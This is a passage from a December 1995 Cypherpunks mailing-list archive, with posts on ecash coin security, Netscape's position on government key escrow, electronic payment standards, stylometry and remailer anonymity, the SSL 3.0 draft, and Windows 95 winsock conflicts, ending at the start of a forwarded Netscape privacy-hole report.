Is that a valid > > assesment? What is needed to make these people start caring about > > that? > > I didn't go to the meeting. On the other hand, I notice Cybercash people > in influential positions on the comittee. I'd also contact > > > From: "Debbie O'Dell" > > > To: Electronic Commerce Working Group Reflector > -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From iagoldbe at csclub.uwaterloo.ca Mon Dec 4 14:54:48 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Mon, 4 Dec 95 14:54:48 PST Subject: Questions/Comments on ecash protocol (fwd) In-Reply-To: Message-ID: <49vu6v$j0j@calum.csclub.uwaterloo.ca> In article , Lucky Green wrote: >Hal wrote: >[parts elided] > >>BTW since apparently both deposit and payment messages are not encrypted, >>coins made out to "@" are in danger of being stolen both while en route >>from customer to shop and from shop to bank. This is significant from >>the point of view of payee anonymous systems, which will need to use such >>coins. More encryption will be necessary when such coins are passed >>around. > >Absolutely. Wildcard coins are stealable in transit. However, one might >safely assume that transactions conducted using such coins be encrypted by >other methods. > But do the current implementations support this? Can Sam's Shop's ecash client tell that the payment he just received was made out to "@", and if so, should encrypt the deposit message to the bank? What if Sam is not around to enter his secret key? - Ian From sjb at universe.digex.net Mon Dec 4 14:58:50 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Mon, 4 Dec 95 14:58:50 PST Subject: Netscape gives in to key escrow In-Reply-To: Message-ID: <199512042259.RAA08133@universe.digex.net> Black Unicorn writes: >I am most distressed because of what I see as a snowjob. > >"We are anti-GAK" > >Great, tell me what you have done to prevent GAK from proliferating. This is a poor argument. I'd consider myself "anti-war", though I've done nothing more than argue against it and behave peacefully myself. I've even heard "pro-war" arguments and considered some of them valid, though not enough to change my opinion. Netscape has pretty clearly said that they don't like the idea of GAK, and that in fora where such things are discussed, they'll argue against it. They've also said that they won't let mandatory GAK put them out of business. That *doesn't* make them pro-GAK. Jim Clark hasn't made any statements to the effect that *Netscape* supports GAK (quite the contrary), but he *has* noted the government position --- "GAK is necessary for law enforcement". From jya at pipeline.com Mon Dec 4 15:00:36 1995 From: jya at pipeline.com (John Young) Date: Mon, 4 Dec 95 15:00:36 PST Subject: Privy Affairs Message-ID: <199512042300.SAA17549@pipe4.nyc.pipeline.com> The WSJ and Financial Times report today on The New Transatlantic Agenda, the trade and security pact signed by the US and Europe yesterday to "boost cooperation." [WSJ] The accord's center piece commits the parties to working together on 150 specific policy areas, including cutting trade barriers, strengthening cooperation in nuclear nonprofliferation and fighting international crime. "There are mixed urges in Europe right now," says Kirsty Hughes, head of the European program at the Royal Institute for International Affairs in London. "On one hand, the nations of Europe want to keep the U.S. involved in European affairs, and on the other, they want to develop their own economic, political and security arrangements." Then, the Fin Times piece, headlined "Clinton and EU leaders agree on crime," reports on a variety of issues but mentions only in passing the phrase "crime, drugs and terrorism." This treatment suggests that there is more boosting of security and crime-fighting cooperation than the press is reporting -- or privy to. Recall recent reports on: A World Trade Organization cyberspace czar to bring law and order to the unruly Net. EU plans for setting standards and certifications for products, including software for computer security, encryption and authentication. The future threat to "the West" by a hyper-cyber Asia [ex-colonies] deploying information wizardry to level the playing field. Cooperation on trade and "crime, drugs and terrorism" might then be a euphemism for economic aggression -- US-EU international affairs arranged to maximize benefits for transatlantic self-interests. If so, then cryptography is truly a highly valuable munitions for economic warfare, worthy of the strongest law and enforcement measures, closely fit to the power of the weapon. With US-EU GAK and ITAR to protect markets of the transatlantic super-nation and selected meta-atlantic partners in crime-pure joy. Would Michael Froomkin, RIIA Foreign Associate, care to generously unscramble this international affairs sigint? Air the pinstriped privy, ahem. From EALLENSMITH at mbcl.rutgers.edu Mon Dec 4 15:40:43 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Mon, 4 Dec 95 15:40:43 PST Subject: towards a theory of reputation Message-ID: <01HYF42AZPR49S3PZW@mbcl.rutgers.edu> From: IN%"hfinney at shell.portal.com" "Hal" 2-DEC-1995 16:27:08.83 I do think the idea of analyzing costs in terms of "throwing away your reputation" by cheating and starting anew is an interesting approach. The question is whether you can really quantify the value of a reputation. I know in business now corporations do carry on their books something called "good will" which I believe is roughly the value of their good name and trade marks. However it is not normally considered to be a major asset, I think. -------------------- How much of an asset it is considered to be tends to depend on the size of the corporation and on the business. For instance, when one doctor buys out another's practice, "good will" is usually one of the larger categories. In this case, I believe (it's been a bit since I read about it) that this essentially is the value of recommendations and of the name of the office. -Allen From EALLENSMITH at mbcl.rutgers.edu Mon Dec 4 16:04:42 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Mon, 4 Dec 95 16:04:42 PST Subject: SEN_sor Message-ID: <01HYF48O4X749S3PZW@mbcl.rutgers.edu> From: IN%"ecarp at netcom.com" 4-DEC-1995 15:36:34.26 Oh, hell, even I can do *that*. Let's see ... motherboard, $100. Floppy drive and controller, $50. 14.4KB modem, $50. Case and power supply, another $50 or so. $250 profit. ---------------------- You appear to be forgetting the interface to the TV set; it will cost more than for a monitor, unless I've missed something in my last few PC purchases. -Allen From EALLENSMITH at mbcl.rutgers.edu Mon Dec 4 16:05:32 1995 From: EALLENSMITH at mbcl.rutgers.edu (E. ALLEN SMITH) Date: Mon, 4 Dec 95 16:05:32 PST Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Message-ID: <01HYF4D3MY5S9S3PZW@mbcl.rutgers.edu> From: IN%"sameer at c2.org" "sameer" 4-DEC-1995 15:47:39.33 It doesn't appear that these people seem to care about cash-like anonymous token-based payment schemes. Is that a valid assesment? What is needed to make these people start caring about that? ----------------- I doubt that anyone from a CC company is going to have much enthusiasm for anonymous payment methods. One way in which they (and the credit bureaus, of course) make money is via the information they can gain from credit card usage. -Allen From thad at hammerhead.com Mon Dec 4 16:13:01 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Mon, 4 Dec 95 16:13:01 PST Subject: Netscape and Jim Clark Message-ID: <199512050004.QAA07307@hammerhead.com> Jim must have done something wrong today, he only made $120,000,000... thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-2244 From unicorn at schloss.li Mon Dec 4 16:22:24 1995 From: unicorn at schloss.li (Black Unicorn) Date: Mon, 4 Dec 95 16:22:24 PST Subject: Netscape gives in to key escrow In-Reply-To: <199512042259.RAA08133@universe.digex.net> Message-ID: On Mon, 4 Dec 1995, Scott Brickner wrote: > Black Unicorn writes: > >I am most distressed because of what I see as a snowjob. > > > >"We are anti-GAK" > > > >Great, tell me what you have done to prevent GAK from proliferating. > > This is a poor argument. It would be if there were not some context here. For example: > > I'd consider myself "anti-war", though I've done nothing more than > argue against it and behave peacefully myself. I've even heard > "pro-war" arguments and considered some of them valid, though not > enough to change my opinion. Yet I've not heard anyone else arguing, e.g., that you have done more to promote anti-war ideals than anyone else. (A case that was made for Netscape and crypto) I have also not heard you assert that you are actively lobbying against war. (As employees and others have argued Netscape is doing) I have also not heard you flip flop on your position. (Which in my view, and other's, Netscape has). Were you in a position where you had a great deal of infulence over war policy, I think you would agree that others asking 'what exactly have you done to eliminate war' is not quite as alien to the context of your example. In short, your example is argumentation by reduction. > Netscape has pretty clearly said that they don't like the idea of GAK, Their employees have also asserted that they are working actively to discourage GAK, that they are lobbying to get it (insert ambigious words here) and on every attempt to get some clairification I have seen hedging, assertions that quickly dissolved under the mildist prodding, and snowjobbing. > and that in fora where such things are discussed, they'll argue against > it. They've also said that they won't let mandatory GAK put them out > of business. That *doesn't* make them pro-GAK. It certainly doesn't make them active "anti-GAK" either. Netscape needs to realize that the sword they carry is sharp. If they choose not to use it, I want to know why. Actually, even if I don't know why, I don't care, so long as they don't lie or decieve, throwing up thin veils to conceal their lack of organization, appreciation of their position, or simple laziness and lack of concern. > Jim Clark hasn't made any statements to the effect that *Netscape* > supports GAK (quite the contrary), but he *has* noted the government > position --- "GAK is necessary for law enforcement". > --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From dwa at corsair.com Mon Dec 4 16:34:46 1995 From: dwa at corsair.com (Dana W. Albrecht) Date: Mon, 4 Dec 95 16:34:46 PST Subject: Stylometry Message-ID: <199512050028.QAA04676@elmos.corsair.com> I recently came across an interesting book. Detailed information follows. It would seem (to me) to have interesting implications for anonymous remailers. Does anyone on the list have any knowledge of this subject? I've seen it hinted at, but never systematically explored. In particular, does anyone know how it has advanced since the book was written (1978)? Additional references? Dana W. Albrecht dwa at corsair.com ------------------------------------------------------------------------------ Morton, A. Q. (Andrew Queen) Literary detection : how to prove authorship and fraud in literature and doc uments / A. Q. Morton. [Epping, Eng.] : Bowker, c1978. xiii, 221 p. ; 25 cm. LC CALL NUMBER: PN171.F6 M64 SUBJECTS: Authorship, Disputed. Language and languages--Style. Linguistics--Statistical methods. DEWEY DEC: 801/.959 NOTES: Includes index. Bibliography: p. 221. ISBN: 0859350622 : L10.50 LCCN: 79-310591 r85 ------------------------------------------------------------------------------ Contents List of Tables vii List of Figures xi Preface xiii SECTION I THE THEORY OF STYLOMETRY 1. The Problems of Identification and Recognition 3 2. The First Steps 19 3. Statistics and Stylometry 29 4. Statistics as Description 40 5. The Second Stage in Statistical Description 51 6. Like or Unlike? The Statistics of Comparisons 71 7. The Rules of the Game 75 SECTION II THE FEATURES OF LANGUAGE WHICH ARE OF PARTICULAR INTEREST IN STYLOMETRY 8. The Writer in his Works 95 9. The Inflected Language 108 (i) Positional Measurements and Word Mobility 109 (ii) Isotropic Distributions 114 (iii) Anistropic Distributions 121 10. The Uninflected Language 130 11. The Occurrence of Proportional Word Pairs 147 SECTION III APPLICATIONS 12. Introductory 153 13. The Homeric Problem 158 14. The Authorship of the Pauline Epistles 165 15. The Shakespeare Problems 184 16. The Inimitable Jane 189 17. A Word from Baker Street 192 18. Let Justice be Done 195 CONCLUSION 208 Appendix 211 Glossary 215 Bibliography 221 Index 223 ------------------------------------------------------------------------------ (From page 7) The main subject of this book is one special aspect of identification, the determination of the authorship of texts. Since the development of photography it has been a simple matter to determine who wrote or who typed out a text. It is even possible to demonstrate which instrument was used in the writing or typing. But such physical comparisons do not indicate who composed the text or altered it from its original form. To enable this to be done a descriptive science known as stylometry is needed. Stylometry is the science which describes and measures the personal elements in literary or extempore utterances, so that it can be said that one particular person is responsible for the composition rather than any other person who might have been speaking or writing at that time on the same subject for similar reasons. Stylometry deals not with the meaning of what is said or written but how it is being said or written. Stylometry does not deal with the evidential value of statements. It does not asked whether this or that particular statement is true or reasonable, but applies itself to the question, 'In whose words are these sentiments expressed?' ------------------------------------------------------------------------------ Conclusion Looking back, the development of stylometry is easy to see. De Morgan was the first to point out the pattern of argument which should be used in stylometry, statistics would describe samples and sampling differences would become the measure of similarity or difference. But to suggest that something might well be true and to show that is is true are two different propositions and it was a long time before anyone actually developed a statistical test of authorship. It should have been done by Udny Yule in his book, _The Statistical Study of Literary Vocabulary_, but he made an unfortunate error in calculating the standard errors of sentence length distributions with the result that it was not until W.C. Wake corrected the error and continued his study of sentence length distributions of Greek authors in 1946 and 1957 that a reliable test was established. With the pattern of argument confirmed, attention then turned to what should be counted and analysed. Like all his colleagues, the author spent some time looking at those features of style which literary critics had noted and used as the basis for their judgements. This was making stylometry the conversion of stylistic description into quantitative terms; it was using the accumulated experience of scholars as it had been expressed in traditional forms. This proved to be an unexciting quest. In some cases, for example the suggestion of Sir Kenneth Dover that the number of finite verbs used by a writer of Greek prose might be an indicator of authorship, it turned out to be valid but required samples impracticably large for any New Testament application, and in others it soon became clear that the observations had no firm foundation in any objective data. It was the realisation that in Greek writing position was of prime importance that gave stylometry its first general theory. That such a theory was justified was confirmed when a dramatic plea for help with a police statement written in modern English posed a problem which was rapidly solved by an adaptation of positional methods to the constraints of an uninflected language. In Greek where word movement is free, look at word movement and position; in English where word movement is restricted, look at immediate context. There is so much material available that routine applications of stylometry will present few problems. What remain intractable are problems of mixed tests where one writer has been revised by another or other situations in which the homogeneity of the text is in doubt. Immediate progress seems likely to be made in two directions. Both concern the efficiency of methods rather than the further development of methods. A simple way to increase the separation of two authors is to combine a number of tests in multi-variate statistics. Properly done this will generate figures which show vast differences where such exist, although the differences are diffused throughout a number of statistics and are nowhere to be seen as clearly as the measure of their combined effect. The difficulty is that multi-variate statistics can conceal the underlying features and in some instances lead to confusion or misapprehension. One such set of statistics showed the differences between brands of cigarettes and showed very large differences. But a study of the statistics which were combined in the analysis revealed that the largest differences concerned the packing and the printing on the packets. While this might be useful for anyone designing a machine to select brands and sort them automatically, it was much less useful for any smoker who wanted to know about the quality of the cigarette. The other development which is easy to forecast is the formation of profiles of individual writers so that quick reference and resolution of problems will be possible. One way of doing this is to start with a set of collocations. It might be that after "and" a writer is very fond of using "the" and hardly ever uses "so." This can be made a test of how often "the" after "and" occurs compared to "so" after "and". The combination of a few such tests based upon the personal maxima and minima of an author will soon provide a measure by which he can be detected in a large number of candidates. The ultimate aim has been set by the information theory experts who, many years ago, calculated that in any 200 words, written or spoken, there was enough information to enable their author to be picked out of the human race. This is like saying that every cubic mile of sea water contains twenty tons of gold; it may be there but getting it out is not easy. But the aim must be to be able to say of any couple of hundred words, it is or is not the sole production of the person who produced this other sample. It may seem that we are a long way from being able to do so, but how much nearer we have come in the last twenty years. Who will say that the next twenty years will not produce the desired result? ------------------------------------------------------------------------------ From cman at communities.com Mon Dec 4 17:25:55 1995 From: cman at communities.com (Douglas Barnes) Date: Mon, 4 Dec 95 17:25:55 PST Subject: NSA Frisbee [EXTREMELY FRIVOLOUS] Message-ID: Mike Bakkes, who is on the EC board, recently brought in an NSA flying disk. A .gif of it is available at: http://www.communities.com/foo/NSAfris.gif We are currently looking for a source of these; we will be calling the number listed on the disk itself tomorrow during normal office hours in MD. From pfarrell at netcom.com Mon Dec 4 18:06:00 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Mon, 4 Dec 95 18:06:00 PST Subject: Meeting notes from ANSI X.9 Meeting on Electronic Payment Message-ID: <75960.pfarrell@netcom.com> rah at shipwright.com (Robert Hettinga) writes: >> It doesn't appear that these people seem to care about >> cash-like anonymous token-based payment schemes. Is that a valid >> assesment? What is needed to make these people start caring about >> that? > My guess is, they won't. Ever. > > Reality check. Accountants _know_ how to do books that deal with cash. Most small business keep their books on a cash basis. Cash was how the world worked until recently. Accountants know how to meet acceptable auditing standards when transactions are in cash. I learned this from the CPA I live with. Seems to me this list doesn't have enough folks with a grounding in non-technical issues. Until the last 30+ years, the world lived on cash. I like cash. I assume I'll like electronic cash once people remember what cash is and model it correctly. Got to to get my beauty sleep before tomorrow's GAK export meeting... Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From unicorn at schloss.li Mon Dec 4 02:14:06 1995 From: unicorn at schloss.li (Black Unicorn) Date: Mon, 4 Dec 1995 18:14:06 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <30c10224.23418425@email.pdcorp.com> Message-ID: On Sun, 3 Dec 1995, Dan Weinstein wrote: > On Sat, 2 Dec 1995 20:16:08 -0500 (EST), Black Unicorn > wrote: > > >On Sat, 2 Dec 1995, Jeff Weinstein wrote: > > > >> Black Unicorn wrote: > >> > To the outsider, it looks as if Netscape 'owes' the government. > >> > >> We do owe the government. They have paid us for Servers and Clients > >> that support Fortezza. That is what we owe them. The money that the > >> NSA gave us for Fortezza is not very significant compared to what we > >> are getting from commercial sources. > > > >Obviously it was significant enough to take. It was also a perfect > >opportunity for Netscape to express concerns about the future of the > >technology, which is in netscape's interest. The astute deal maker would > >be happy to work with the NSA on his own terms. Instead, it > >would appear that Netscape is working FOR NSA on their terms. > > If you read what they had to say about this, you know that they are > hoping others will create non-escrowed crypto hardware using the same > interface. I see no reason for them to not include support for any > available hardware system (even if it includes GAK), as long as they > continue to support non-escrowed encryption internally. This allows > the customer to decide that they have no problem with GAK and use the > external system, or use the internal system and not have GAK. I read it quite carefully. I just was not as easily taken in by the double speak as you were. Hoping others will do something is about as useful as sitting on your thumb. Netscape is in a position to make some policy impact here. If they insist on going another way, I want to hear why, not that they are all on our side and we should be nice because really we're all in this together, and afterall, Netscape isn't such a bad lot. They can support whoever they like. I just want to hear WHY. More importantly, I don't want to be snowed with some horse hockey answer. It insults my intelligence. Yours was obviously unaffected. > >I'd be interested to know what a 'government liason person' is. It > >sounds to me like an 'in house lobbist.' There is an old joke in the > >beltway about in house lobbists. > > > >I also would like to know why you are actively lobbying for > >'claification' rather than 'modification' of the current policy. > > Until the current policy is clearly defined it is like a moving > target. Once the government has been pinned down to a single policy, > it will be much easier to dispute their policies. Currently the > government can say anything they want about their enforcement of ITAR, > because they have not stated a clear set of rules with regard to it. > Once they have set clear rules, those rules can be shown to be overly > restrictive or even unenforceable. I believe you actually think you are teaching me something here. I said before, and I will say again. If Netscape is against GAK, then let them be AGAINST GAK. If they are just going to try and finesse their way into the market without making to many waves, let's hear it that way instead of some crap about how they are 'lobbying actively against GAK' (Which I might point out, is an assertion that fell apart at the most basic prodding). > Also, lawyers usually advise clients based on a worst case scenario, > thus when the government is unclear on its rules, the lawyers advise > their clients based upon the worst possible interpretation of the law. > This is done to protect their client. By not stating a policy, the > government is making that worst case happen, without having to be the > bad guy by actually attempting to enforce such a policy. I really think you are pompus enough to think you are teaching people things they don't know here. I invite you to re-read the entire conversation and discover, as an exercise, that the issue is not what the government is or is not doing, but what netscape is or is not doing. I could care about Netscape's loose-lipped lawyers. > > > >Netscape seems to be taking the position, "We'd love it if you'd let us > >do X, but we are happy to roll over for whatever." and "By the way, > >what is the rule on exporting software again?" > > > >I am impressed that some effort is being made. I think it in the form of > >'too little, too late.' But hey, who am I? > > I think you are being too critical, they have done more than any > company I know of to make easy to use crypto widely available. 0 + .00001 = .00001 Yes, just as last time you checked, .00001 is still more than 0. > They > may be willing to obey the laws if they require GAK, but I do not feel > that they are just rolling over either. I strongly oppose GAK, but I > do not believe that no crypto is better than GAK crypto. I would > rather keep some people out than nobody out. Your ignorance is assuming that the options you present are the only options available. JW made the same mistake. In logical discourse this is called "narrowing the field." It's a version of the 'straw man' and a classic flaw in logical argument. > Dan Weinstein > djw at pdcorp.com > http://www.earthlink.net/~danjw > PGP public key is available from my Home Page. > All opinions expressed above are mine. > > "I understand by 'freedom of Spirit' something quite definite - > the unconditional will to say No, where it is dangerous to say > No. This has got to be the most ironic of signatures I have ever seen. Why don't you begin to apply the cute quotes you put in your .sig to real life and tell Netscape to grow a backbone and say 'No.' to GAK? > Friedrich Nietzsche --- My prefered and soon to be permanent e-mail address: unicorn at schloss.li "In fact, had Bancroft not existed, potestas scientiae in usu est Franklin might have had to invent him." in nihilum nil posse reverti 00B9289C28DC0E55 E16D5378B81E1C96 - Finger for Current Key Information From ecarp at netcom.com Mon Dec 4 18:26:03 1995 From: ecarp at netcom.com (Ed Carp) Date: Mon, 4 Dec 95 18:26:03 PST Subject: Do the Right Thing Message-ID: <199512050326.VAA30525@khijol> > Date: Mon, 4 Dec 1995 01:42:25 -0800 > To: cypherpunks at toad.com > From: anonymous-remailer at shell.portal.com > Subject: Re: Do the Right Thing > On Sun, 3 Dec 1995, Timothy C. May wrote: > > > > Netscape, being the dominant browser company, and Microsoft, being the > > dominant OS company, are in special positions to "build in Big Brother." > > I'm not claiming they are, just that they are clearly in a position to make > > it technologically more feasible to make non-GAK illegal. They both need to > > carefully think about the role that's been "given" to them (whether by > > fortune, hard work, or being in the right place at the right time) and do > > what's right. > > That's always a tough position to be in. If Netscape or Microsoft > knew what was the "right" thing to do, I don't doubt that they'd be > doing it. That's one of the most politically and socially naive statements I've ever heard. Corporations *never* do the "right thing" unless it will increase their profits. Remember, corporations are in business to make money by providing a product or service that people will pay money for. Whatever gets in the way of that will fall by the wayside. That's an economic fact of life. From cactus at hks.net Mon Dec 4 20:07:35 1995 From: cactus at hks.net (Leslie Todd Masco) Date: Mon, 4 Dec 95 20:07:35 PST Subject: Do the Right Thing Message-ID: <199512050406.XAA03449@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <199512050326.VAA30525 at khijol>, Ed Carp wrote: >That's one of the most politically and socially naive statements I've >ever heard. Corporations *never* do the "right thing" unless it will >increase their profits. I just *love* hearing statments like this from people who have probably never started their own businesses. Corporations are no more or less than their component people. If the people running a corporation care about an issue, the corporation will act upon it -- bounded by the interaction of their survival instinct with their assessment of reality. How could it be otherwise? The literature out there abounds with counterexamples to the "corporations are automata" idea (for some reason, they love to harp on Ben & Jerry's). - -- Todd Masco | "life without caution/ the only worth living / love for a man/ cactus at hks.net | love for a woman/ love for the facts/ protectless" - A Rich Cactus' Homepage - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBMMPFSSoZzwIn1bdtAQG1FAGAsXRzDAFRmZWvyKt8AlkGvHfWgCth9izE Ibj/E41hbgSTvppJot/OWcFpa00B46PD =d6+o -----END PGP SIGNATURE----- From karlton at netscape.com Mon Dec 4 21:29:32 1995 From: karlton at netscape.com (Phil Karlton) Date: Mon, 4 Dec 95 21:29:32 PST Subject: New version of SSL 3.0 Message-ID: <30C3D8F8.2781@netscape.com> SSL 3.0 protocol has been substantially changed from earlier drafts to fix a number of performance and cyrptographic issues. The latest version can be found as PostScript in a compressed tar file on ftp://ftp.netscape.com/pub/review/ssl-spec.tar.Z where is a digit in the range [2-8]. An HTML version should be available in a day or two. I will post the URL when that happens. Netscape is also in the process of submitting this draft to IETF. Questions and comments about this specification should all be directed to ssl-talk at netscape.com. Answers and replies will be posted there. We are quite interested in your feedback. As new eyes see the spec for the first time, I suspect that we will be notified about typos and areas that are not as clear as they should be. As a result, there will probably be an update in 2 weeks or so. PK -- Philip L. Karlton karlton at netscape.com Principal Curmudgeon http://www.netscape.com/people/karlton Netscape Communications From jsw at netscape.com Mon Dec 4 21:39:02 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Mon, 4 Dec 95 21:39:02 PST Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <9512040703.AA14762@pulm1.accessone.com> Message-ID: <30C3DA0C.5969@netscape.com> Black Unicorn wrote: > > On Sun, 3 Dec 1995 blancw at accessone.com wrote: > > > > > Uni, if you're so overwhelmingly and absolutely incensed with Netscape, why > > don't you write to Jim Clark yourself and tell him about his spinelessness and > > all your other opinions of him, his unaccceptable attitude, and his worthless > > company, instead of getting granular with Jim and Dan here on the list? > > > > After all, Jim Clark is the one who made the unpleasant statements. > > > > .. > > Blanc > > > > I would hope that other's might recognize the trend in Netscape and work > to act as I have. > > I have written Mr. Clark. I have also forwarded some of the messages from this list to him. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From jsw at netscape.com Mon Dec 4 21:40:56 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Mon, 4 Dec 95 21:40:56 PST Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <199512040700.XAA14483@blob.best.net> Message-ID: <30C3DA80.79F1@netscape.com> James A. Donald wrote: > > At 12:19 AM 12/4/95 GMT, Dan Weinstein wrote: > >I see, you cannot say that they are really supporting GAK based upon > >the actual statements made, so you simply assert it. > > You cannot say they oppose it either. Jim Clark speaks about > GAK using mostly pleasant sounding favorable words. > > Let me hear him talk about GAK using plain words. > > >Now given point B, I see no reason to expect that they would in the > >past have done much more than they have. Given point C, I see they > >are currently expanding their lobbying. > > I do not see that they are currently expanding their lobbying: Indeed > I do not see that they are currently lobbying. > > >I sent a message to Netscape after reading the article that started > >this, It simply stated that I wanted clarification on their position > >on GAK and that if they were to support it they would lose a loyal > >customer. I have since been convinced by Jeff Weinstein's posts to > >this list that the company does not support GAK, and in fact they > >oppose it. > > I have been convinced that Jeff Weinstein opposes GAK > > If his policy represents company policy then I hope to hear > a similar statement signed authoritatively. > > I have not seen that yet. It is coming. It may take a few days because many of the people involved are travelling over the next few days. I will send something to the list as soon as possible. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From bobj1968 at ns.cencom.net Mon Dec 4 22:09:14 1995 From: bobj1968 at ns.cencom.net (Bob Johnson) Date: Mon, 4 Dec 95 22:09:14 PST Subject: Crypto stuff Message-ID: <30C3FCA9.9CB@cencom.net> Could you send me some info on crypto stuff. I need to secure some files and as yet havent figured out how to do it. If you can help I would appreciate it. From anonymous-remailer at shell.portal.com Mon Dec 4 22:30:37 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 4 Dec 95 22:30:37 PST Subject: Do the Right Thing Message-ID: <199512050629.WAA28721@jobe.shell.portal.com> On Mon, 4 Dec 1995, Ed Carp wrote: > > > Netscape, being the dominant browser company, and Microsoft, > > > being the dominant OS company, are in special positions to > > > "build in Big Brother." I'm not claiming they are, just that > > > they are clearly in a position to make it technologically more > > > feasible to make non-GAK illegal. They both need to carefully > > > think about the role that's been "given" to them (whether by > > > fortune, hard work, or being in the right place at the right > > > time) and do what's right. > > > > That's always a tough position to be in. If Netscape or Microsoft > > knew what was the "right" thing to do, I don't doubt that they'd be > > doing it. > > That's one of the most politically and socially naive statements I've > ever heard. Corporations *never* do the "right thing" unless it will > increase their profits. Sure, I realize this. I'm very aware of it in fact. The art of persuasion is the science of selfish self-interest. Once a company realizes that their "profits" are in jeopardy, or that individual corporate officers are liable to face prison time, then they generally do the "right" thing, what's in their interest. It's just like asking questions. You never ask a question to which you don't already have the answer. > Remember, corporations are in business to > make money by providing a product or service that people will pay > money for. Whatever gets in the way of that will fall by the > wayside. That's an economic fact of life. Sure. This is true. Facts of Life. Stiff upper-lip and such. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. From jsw at netscape.com Mon Dec 4 22:35:36 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Mon, 4 Dec 95 22:35:36 PST Subject: GAK_hit In-Reply-To: <199512041603.IAA22793@blob.best.net> Message-ID: <30C3E74F.4BB0@netscape.com> James A. Donald wrote: > > At 09:25 AM 12/4/95 -0500, John Young wrote: > > 12-4-95. W$Jabber: > > > > "Microsoft Probe Spurs Subpoenas Tied to Internet. > > Antitrust Effort Appears Focused on Windows 95 Disabled > > Rival Software." > > > The subpoena issued to Netscape may be of particular > > significance. In the estimate of Netscape and industry > > observers, > > I regularly use netscape on windows 95, and I conclude that > this subpoena is pure, 100% harassment. I've heard that when a machine that already has Internet In A Box, Netscape Navigator personal edition, or some other internet software with a stack and dialer is upgraded to Win95, the win95 installation may somehow disrupt the functioning of the winsock or dialer. I've also heard that re-installing the application will solve the problem. I've never seen the problem myself, and don't know anything about any subpoena... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From accessnt at ozemail.com.au Mon Dec 4 23:23:48 1995 From: accessnt at ozemail.com.au (Mark Neely) Date: Mon, 4 Dec 95 23:23:48 PST Subject: GAK_hit Message-ID: <199512050723.SAA03602@oznet02.ozemail.com.au> > I've heard that when a machine that already has Internet In A >Box, Netscape Navigator personal edition, or some other internet >software with a stack and dialer is upgraded to Win95, the win95 >installation may somehow disrupt the functioning of the winsock >or dialer. I've also heard that re-installing the application >will solve the problem. I've never seen the problem myself, >and don't know anything about any subpoena... > > --Jeff > >-- >Jeff Weinstein - Electronic Munitions Specialist My understanding is that Win '95 installs its winsock.dll in /windows/system, which is where a number of other Internet packages also install their winsock.dll. As their .dll is replaced by MS's, they cease to function (either correctly or at all). The problem is resolved by re-installing the original winsock.dll or configuring the Internet software to look elsewhere for it. Regards, Mark Neely ___ Mark Neely - accessnt at ozemail.com.au Lawyer, Professional Cynic Author: Australian Beginner's Guide to the Internet Work-in-Progress: Australian Business Guide to the Internet WWW: http://www.ozemail.com.au/~accessnt From drozone at winternet.com Mon Dec 4 23:27:59 1995 From: drozone at winternet.com (Thaddeus Ozone by way of carolann@censored.org Censored Girls Anonymous) Date: Mon, 4 Dec 95 23:27:59 PST Subject: Tricky Netscape Security Hole Message-ID: <199512050729.AAA28538@mailhost1.primenet.com> Yes it's full of headers, but it's the complete, unexpurgated version. If this theory is correct, this IS FAR WORSE THAN A 40 bit key. I saw the livescript on the source code. I use 1.22 for image stability right now, though. Yes it's a came from, a came from, a came from kinda deal, but in the interest of security brevity it "seems real enough" to me. Love Always, Carol Anne >Posted-Date: Mon, 4 Dec 1995 12:57:21 -0600 >X-Sender: jeff at cyborganic.com >Mime-Version: 1.0 >Date: Mon, 4 Dec 1995 10:51:56 -0700 >To: cybernauts-l at netcom.com >From: foodie at netcom.com (We're a Comglomerate) (by way of jeff at cyborganic.com > (Jeffrey Logsdon)) >Subject: Tricky Netscape Security Hole > >Anybody else see this happening? > >Eternal Vigilance, and all that. > >- ------- Start of forwarded message ------- >>From: Scott Weston >>Subject: Netscape 2.0b2 allows for invasion of privacy >>Newsgroups: aus.net.announce,comp.privacy >>Date: Fri, 01 Dec 1995 11:09:06 +1100 > >Hi 'Net Dwellers, > >First off - I've posted this before (however not to this group) and only >got a response from the Netscape Corp. They were glad I found the >problem and said that they would fix it, however I feel that people >should know about it. Also I would like people to help me spread this >document around, i.e. if you know of a newsgroup (or people) that would >find this interesting then please re-postit. > >On with the problem... > 